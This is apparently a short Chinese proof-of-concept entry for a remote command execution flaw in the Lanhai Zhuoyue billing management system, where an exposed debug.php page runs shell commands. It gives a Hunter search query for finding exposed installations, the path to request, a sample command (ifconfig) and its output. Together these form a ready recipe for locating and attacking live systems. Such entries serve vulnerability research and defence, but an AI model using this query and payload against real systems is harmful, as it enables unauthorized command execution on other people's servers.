漏洞描述
i ⭐
蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行
漏洞影响
s ✅
蓝海卓越计费管理系统
空间测绘
d ⭕
Hunter:web.title="蓝海卓越计费管理系统"
漏洞复现
- ✅访问首页
- ✅执行Payload命令,访问路径/debug.php
$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:21:9B:FB:30:27
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0